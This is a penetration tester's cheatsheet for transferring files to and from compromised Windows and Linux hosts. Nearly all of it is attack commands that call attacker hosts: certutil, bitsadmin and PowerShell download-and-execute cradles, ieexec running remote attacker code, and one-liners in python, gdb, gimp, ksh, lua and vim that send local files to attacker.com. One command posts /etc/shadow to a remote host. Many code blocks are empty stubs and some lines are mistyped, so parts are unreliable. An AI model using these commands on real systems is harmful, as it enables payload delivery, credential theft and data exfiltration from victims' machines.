Ultimate - File Transfer Cheatsheet
What is this ?
This is my cheatsheet to transfer files to and from target machines which are Windows or Linux hosts. This is divided into two sections : -
- Windows
- Linux
In each section I have listed which are the main techniques that will allow you to easily transfer files. The last part in each of the section above is named as Others which will show some more tricks in a system that is very hardened it might be useful. I haven’t had to use any of those yet on all the machines that I have solved however if need arises its something you could try.
Windows
Bitsadmin
bitsadmin /rawreturn /transfer getpayload http://AttackerIP/file c:\path\to\out\file
Certutil
certutil -urlcache -split -f http://AttackerIP/file C:\path\to\out\file
debug.exe
The debug.exe
program acts as an assembler, disassembler, and a hex dumping tool. We’re able to take binaries like netcat ~ nc.exe and disassemeble them into hex. A series of non-interactive echo commands will write out the binary file into its hex representation. We can then use debug.exe to assemble the hex file into the original binary file nc.exe on the compromised host. There is a 64k size limit for transferable files.
On Kali : upx -9 nc.exe
This is close to our limit. We can use upx ~ (executable packer) to compress it further:
The file size is now more suitable for transfer and has been decreased in size by almost 50%. We can now convert the nc.exe file into a text file usable by debug.exe on our compromised Windows host. The tool we’ll be using is exe2bat.exe
cp /usr/share/windows-binaries/exe2bat.exe .
Copy exe2bat to current working directory.
wine exe2bat.exe nc.exe nc.txt
This will produce a nc.txt file we can simply copy paste into the remote windows shell, and nc.exe will be automatically created on the compromised host.
OpenSSL
Generate Keys (on Kali) : openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Serve the file on Kali : openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file
Execute on Windows box to transfer file to C:\file : C:\path\to\openssl.exe s_client -quiet-connect AttackerIP:1234 > C:\file
PowerShell
Within PowerShell
Invoke-WebRequest -Uri "http:/AttackerIP/file" -OutFile "C:\path\to\file"
(New-Object Net.WebClient).downloadFile('http://10.10.14.45/shell.bat', 'C:\Users\Public\Downloads\shell.bat')
Outside PowerShell
powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://AttackerIP/file')
Non-Interactive PowerShell script
1 |
|
IWR “http://yourip/shell.exe” -OutFile “shell.exe”
, use this incase of transferring files from HTTP.
SMB
- SMBserver.py
On Kali : python smbserver.py transfer_share /root/shells/shell.exe
On Target Windows :
// We can then check that our SMB share is up and running from our compromised Windows host
net view \\AttackerIP
// Windows commands like dir and copy can also be used
dir \\AttackerIP\transfer_share
copy \\AttackerIP\transfer_share\shell.exe
//Executing shell.exe on compromised Windows host via our SMB share ~ transfer_share
C:> \\AttackerIP\transfer_share\shell.exe
- Impacket-SMBServer
On Kali : impacket-smbserver ShareName SharePath
On Windows (Powershell) : New-PSDrive -Name ShareName -PSProvider "FileSystem" -Root "\\Kali-IP\\ShareName"
If have to be done natively this can be used : net usershare add test /mount '' 'Everyone:F' guest_ok=y
probably mount this on a docker container share.
TFTP
tftp -i AttackerIP get file
On Kali : apt-get install python-pyftpdlib && python -m pyftpdlib -p 21
With the server up and running, we can transfer files interactively or non-interactively:
- Interactively :
1 |
|
- Non-Interactive :
1
2
3
4
5
6
7
8//Non-Interactive
C:> echo open AttackerIP > c:\ftp.txt
C:> echo anonymous >> c:\ftp.txt
C:> echo anonymous >> c:\ftp.txt
C:> echo binary >> c:\ftp.txt
C:> echo get shell.exe >> c:\ftp.txt
C:> echo bye >> c:\ftp.txt
C:> ftp -s:C:\ftp.txt
Visual Basic Script (VBS)
- Option 1 :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26// Paste each line seperately into Windows shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs http://AttackerIP/file file
- Option 2 :
echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") : objXMLHTTP.open "GET", "http://AttackerIP/file", false : objXMLHTTP.send() : Set objADOStream = CreateObject("ADODB.Stream") : objADOStream.Open : objADOStream.Type = 1 : objADOStream.Write objXMLHTTP.ResponseBody : objADOStream.Position = 0 : Set objFSO = Createobject("Scripting.FileSystemObject") : objADOStream.SaveToFile "C:\file":objADOStream.Close > transfer.vbs
cscript transfer.vbs
Others
- bitsadmin.exe
Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
Privileges required : User
- certutil.exe
Download and save 7zip to disk in the current folder.certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Privileges required : User
Download and save 7zip to disk in the current folder.certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Privileges required : User
- desktopimgdownldr.exe
Download
Downloads the file and sets it as the computer’s lockscreenset "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Usecase : Download arbitrary files from a web server
- Esentutl.exe
Download : Copies the source EXE to the destination EXE fileesentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Usecase : Use to copy files from one unc path to another
- Expand.exe
Download : Copies source file to destination.expand \\webdav\folder\file.bat c:\ADS\file.bat
Usecase:Use to copies the source file to the destination file
- Extrac32.exe
Download
Copy the source file to the destination file and overwrite it.
extrac32 /Y /C \webdavserver\share\test.txt C:\folder\test.txt
Usecase:Download file from UNC/WEBDav
- Findstr.exe
Download
Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file.findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
Usecase : Download/Copy file from webdav server
- Ftp.exe
Downloadcmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
Usecase : Spawn new process using ftp.exe. Ftp.exe downloads the binary.
- GfxDownloadWrapper.exe
Download
GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by “Microsoft Windows Hardware”, “Compatibility Publisher”, “Microsoft Windows Third Party Component CA 2012”, “Microsoft Time-Stamp PCA 2010”, “Microsoft Time-Stamp Service”.C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
Usecase : Download file from internet
- Hh.exe
Download
Open the target PowerShell script with HTML Help.HH.exe http://some.url/script.ps1
Usecase : Download files from url
- Ieexec.exe
Download
Downloads and executes bypass.exe from the remote server.ieexec.exe http://x.x.x.x:8080/bypass.exe
Usecase : Download and run attacker code from remote location
- Makecab.exe
Download
Download and compresses the target file and stores it in the target file.makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
Usecase : Download file and compress into a cab file
- Replace.exe
Download
Download/Copy bar.exe to outdirreplace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Usecase : Download file
- Excel.exe
Download
Downloads payload from remote serverExcel.exe http://192.168.1.10/TeamsAddinLoader.dll
Usecase:It will download a remote payload and place it in the cache folder
- Powerpnt.exe
Download
Downloads payload from remote serverPowerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
- Squirrel.exe
Download
The above binary will go to url and look for RELEASES file and download the nuget package.squirrel.exe --download [url to package]
Usecase : Download binary
- Update.exe
Download
The above binary will go to url and look for RELEASES file and download the nuget package.Update.exe --download [url to package]
Usecase : Download binary
- Winword.exe
Download
Downloads payload from remote serverwinword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
- Wsl.exe
Download
Downloads file from 192.168.1.10wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Usecase : Download file
Linux
Bash
cat backup.7z > /dev/tcp/10.10.14.3/9001
curl
1 |
|
fetch (freeBSD)
fetch -o /var/tmp/file "http://AttackerIP/file"
netcat
nc -nlvp 1234 < file
cat file | nc AttackerIP 1234
Transfering files with progress in nc
:
On Server Side : cat backup.iso | pv -b | nc -l 3333
On Client Side : nc 192.168.0.1 3333 | pv -b > backup.iso
Preferably run it on our side because we will have the required dependency
nc -lvp 1235 | pv -b > file
OpenSSL
Generate Keys (on Kali) : openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Serve file (on Kali) : openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file
Execute on Linux host to GET the file : openssl s_client -quiet-connect AttackerIP:1234 > file
Python
1 |
|
chmod +x download.py
python download.py
rsync
- Download Folder :
rsync -r rsync://user@ip/<remote_dir>/ .
- Upload Folder :
rsync -vvaP -6 <local dir> "rsync://user@ip/<remote dir>"
SCP
- To download file from remote system (remote -> local) :
scp user@remote_host:remote_file local_file
- To upload file to remote server (local -> remote):
scp local_file user@remote_host:remote_file
socat
socat TCP4-LISTEN:8000,fork file:<file to transfer> // server
socat TCP4:<ip>:8000 file:<file to get>,create // client
wget
wget http://AttackerIP/file -o /var/tmp/file
sudo wget --post-file=/etc/shadow 10.10.10.142
Others
- bash
1.1
1 |
|
1.2
1 |
|
- cpan
1 |
|
Curl
File upload
It can exfiltrate files on the network.
Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the @ to send hard-coded data.
1 |
|
File download
It can download remote files.
Fetch a remote file via HTTP GET request.
1 |
|
- Easy Install
File Upload
It can exfiltrate files on the network.
Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
1
2
3
4
5
6
7
8export URL=http://attacker.com/
export LFILE=file_to_send
TF=$(mktemp -d)
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' > $TF/setup.py
easy_install $TFServe files in the local folder running an HTTP server.
1
2
3
4
5
6
7export LPORT=8888
TF=$(mktemp -d)
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
easy_install $TF
File Download
It can download remote files. Fetch a remote file via HTTP GET request. The file path must be absolute.
1
2
3
4
5
6
7
8
9
export URL=http://attacker.com/file_to_get
export LFILE=/tmp/file_to_save
TF=$(mktemp -d)
echo "import os;
os.execl('$(whereis python)', '$(whereis python)', '-c', \"\"\"import sys;
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve('$URL', '$LFILE')\"\"\")" > $TF/setup.py
pip install $TF
- Finger
File Upload : It can exfiltrate files on the network.
Send a binary file to a TCP port. Run sudo nc -l -p 79 | base64 -d > “file_to_save” on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
1 |
|
File Download
It can download remote files. Fetch remote binary file from a remote TCP port. Run base64 “file_to_send” | sudo nc -l -p 79 on the attacker box to send the file.
1 |
|
- ftp
File Upload.
It can exfiltrate files on the network. Send local file to a FTP server.
1 |
|
File Download
It can download remote files. Fetch a remote file from a FTP server.
1 |
|
- GDB
File upload
It can exfiltrate files on the network.
This requires that GDB is compiled with Python support. Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
1
2
3
4
5
6export URL=http://attacker.com/
export LFILE=file_to_send
gdb -nx -ex 'python import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' -ex quitThis requires that GDB is compiled with Python support. Serve files in the local folder running an HTTP server.
1
2
3
4
5export LPORT=8888
gdb -nx -ex 'python import sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit
File Download
It can download remote files.
This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request.
1 |
|
- GIMP
File upload : It can exfiltrate files on the network.
Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
1
2
3
4
5
6export URL=http://attacker.com/
export LFILE=file_to_send
gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
Serve files in the local folder running an HTTP server.
1
2
3
4
5
export LPORT=8888
gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'
File download : It can download remote files.
Fetch a remote file via HTTP GET request.
1 |
|
- IRB
File upload : It can exfiltrate files on the network. Serve files in the local folder running an HTTP server on port 8888.
1 |
|
File download : It can download remote files.
Fetch a remote file via HTTP GET request.
1 |
|
- JJS
File download : It can download remote files. Fetch a remote file via HTTP GET request.
1 |
|
- jrunscript
File download : It can download remote files. Fetch a remote file via HTTP GET request.
1 |
|
- ksh
File upload : It can exfiltrate files on the network.
- Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
1
2
3
4export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT' - Send local file using a TCP connection. Run nc -l -p 12345 > “file_to_save” on the attacker box to collect the file.
1
2
3
4export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
File download : It can download remote files. Fetch a remote file via HTTP GET request.
1 |
|
Fetch remote file using a TCP connection. Run nc -l -p 12345 < "file_to_send"
on the attacker box to send the file.
1 |
|
- LUA
File upload : It can exfiltrate files on the network.
Send a local file via TCP. Run nc -l -p 12345 > "file_to_save"
on the attacker box to collect the file. This requires lua-socket installed.
1
2
3
4
5
6
7
8
9
10
11
12
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
lua -e '
local f=io.open(os.getenv("LFILE"), 'rb')
local d=f:read("*a")
io.close(f);
loc0al s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'
File download : It can download remote files. Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file. This requires lua-socket installed.
1
2
3
4
5
6
7
8
9
10
export LPORT=12345
export LFILE=file_to_save
lua -e 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);'
- LWP-download
File upload. It can exfiltrate files on the network. Send a local file via TCP. Run nc -l -p 12345 > “file_to_save” on the attacker box to collect the file. This requires lua-socket installed.
1 |
|
File download ; It can download remote files. Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file. This requires lua-socket installed.
1 |
|
- nc
File upload. It can exfiltrate files on the network. Send a local file via TCP. Run nc -l -p 12345 > “file_to_save” on the attacker box to collect the file.
1 |
|
File download. It can download remote files. Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file.
1 |
|
- nmap
File upload : It can exfiltrate files on the network.
- Send a local file via TCP. Run `socat -v tcp-listen:8080,reuseaddr,fork` - on the attacker box to collect the file or use a proper HTTP server. Note that multiple connections are made to the server. Also, it is important that the port is a commonly used HTTP like 80 or 8080.
1
2
3
4
RHOST=attacker.com
RPORT=8080
LFILE=file_to_send
nmap -p $RPORT $RHOST --script http-put --script-args http-put.url=/,http-put.file=$LFILE
- Send a local file via TCP. Run nc -l -p 12345 > “file_to_save” on the attacker box to collect the file.
1 |
|
File download : It can download remote files.
- Fetch a remote file via TCP. Run a proper HTTP server on the attacker box to send the file, e.g.,
php -S 0.0.0.0:8080
. Note that multiple connections are made to the server and the result is placed in$TF/IP/PORT/PATH
. Also, it is important that the port is a commonly used HTTP like 80 or 8080.
1 |
|
- Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file.
1 |
|
- openssl
File upload : It can exfiltrate files on the network. To collect the file run the following on the attacker box:
1 |
|
Send a local file via TCP. Transmission will be encrypted.
1 |
|
File download
It can download remote files. To send the file run the following on the attacker box:
1 |
|
Fetch a file from a TCP port, transmission will be encrypted.
1 |
|
- php
File upload. It can exfiltrate files on the network. Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
1 |
|
File download. It can download remote files. Fetch a remote file via HTTP GET request.
1 |
|
- pip
File upload.
It can exfiltrate files on the network.
- Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
1 |
|
- Serve files in the local folder running an HTTP server.
1 |
|
File download.
It can download remote files.
Fetch a remote file via HTTP GET request. It needs an absolute local file path.
1 |
|
- python
File upload.
It can exfiltrate files on the network.
Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
1
2
3
4
5
6export URL=http://attacker.com/
export LFILE=file_to_send
python -c 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'Serve files in the local folder running an HTTP server.
1
2
3
4
5export LPORT=8888
python -c 'import sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'
File download.
It can download remote files.
Fetch a remote file via HTTP GET request.
1
2
3
4
5
6export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
python -c 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])'Ruby
File upload. It can exfiltrate files on the network. Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
1 |
|
File download. It can download remote files.
Fetch a remote file via HTTP GET request.
1 |
|
- rvim
File upload. It can exfiltrate files on the network.
- This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
1
2
3
4
5
6
7
export URL=http://attacker.com/
export LFILE=file_to_send
rvim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))
vim.command(":q!")'
- This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Serve files in the local folder running an HTTP server.
1
2
3
4
5
6
export LPORT=8888
rvim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()
vim.command(":q!")'
- Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"`on the attacker box to collect the file. This requires that rvim is compiled with Lua support and that lua-socket is installed.
1
2
3
4
5
6
7
8
9
10
11
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
rvim -c ':lua local f=io.open(os.getenv("LFILE"), 'rb')
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'
File download.
It can download remote files.
This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Fetch a remote file via HTTP GET request.
1
2
3
4
5
6
7export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
rvim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])
vim.command(":q!")'Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file. This requires that rvim is compiled with Lua support and that lua-socket is installed.
1
2
3
4
5
6
7
8
9
10export LPORT=12345
export LFILE=file_to_save
rvim -c ':lua local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);'SCP
File upload :
It can exfiltrate files on the network. Send local file to a SSH server.
1
2
3
[email protected]:~/file_to_save
LPATH=file_to_send
scp $LFILE $RPATH
File Download :
It can download remote files. Fetch a remote file from a SSH server.
1 |
|
- SFTP
File upload. It can exfiltrate files on the network. Send local file to a SSH server.
1 |
|
File download. It can download remote files. Fetch a remote file from a SSH server.
1 |
|
- SMBCLIENT
File upload : It can exfiltrate files on the network. Install Impacket and run sudo smbserver.py share /tmp on the attacker box to collect the file.
1 |
|
File download : It can download remote files. Install Impacket and run sudo smbserver.py share /tmp on the attacker box to send the file.
smbclient '\\attacker\share' -c 'put file_to_send where_to_save'
- socat
File upload. It can exfiltrate files on the network.
Run socat -u tcp-listen:12345,reuseaddr open:file_to_save,create
on the attacker box to collect the file.
1 |
|
File download : It can download remote files. Run socat -u file:file_to_send tcp-listen:12345,reuseaddr
on the attacker box to send the file.
1 |
|
- SSH
File upload. It can exfiltrate files on the network. Send local file to a SSH server.
1 |
|
File download ; It can download remote files.
Fetch a remote file from a SSH server.
1 |
|
- tar
File upload
It can exfiltrate files on the network. This only works for GNU tar. Create tar archive and send it via SSH to a remote location. The attacker box must have the rmt utility installed (it should be present by default in Debian-like distributions).
1 |
|
File download
It can download remote files.
This only works for GNU tar. Download and extract a tar archive via SSH. The attacker box must have the rmt utility installed (it should be present by default in Debian-like distributions).
1 |
|
- TFtp
File upload : It can exfiltrate files on the network. Send local file to a TFTP server.
1 |
|
File download : It can download remote files. Fetch a remote file from a TFTP server.
1 |
|
- vim
File upload : It can exfiltrate files on the network.
- This requires that vim is compiled with Python support. Prepend :py3 for Python 3. Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
1 |
|
- This requires that vim is compiled with Python support. Prepend :py3 for Python 3. Serve files in the local folder running an HTTP server.
1 |
|
- Send a local file via TCP. Run
nc -l -p 12345 > "file_to_save"
on the attacker box to collect the file. This requires that vim is compiled with Lua support and that lua-socket is installed.
1 |
|
File download ; It can download remote files.
- This requires that vim is compiled with Python support. Prepend :py3 for Python 3. Fetch a remote file via HTTP GET request.
1 |
|
- Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file. This requires that vim is compiled with Lua support and that lua-socket is installed.
1 |
|
- wget
File upload : It can exfiltrate files on the network.
Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use –post-data to send hard-coded data.
1 |
|
File download ; It can download remote files. Fetch a remote file via HTTP GET request.
1 |
|
- whois
File upload : It can exfiltrate files on the network.
Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use –post-data to send hard-coded data.
1 |
|
File download : It can download remote files.
Fetch a remote file via HTTP GET request.
1 |
|
Sources : -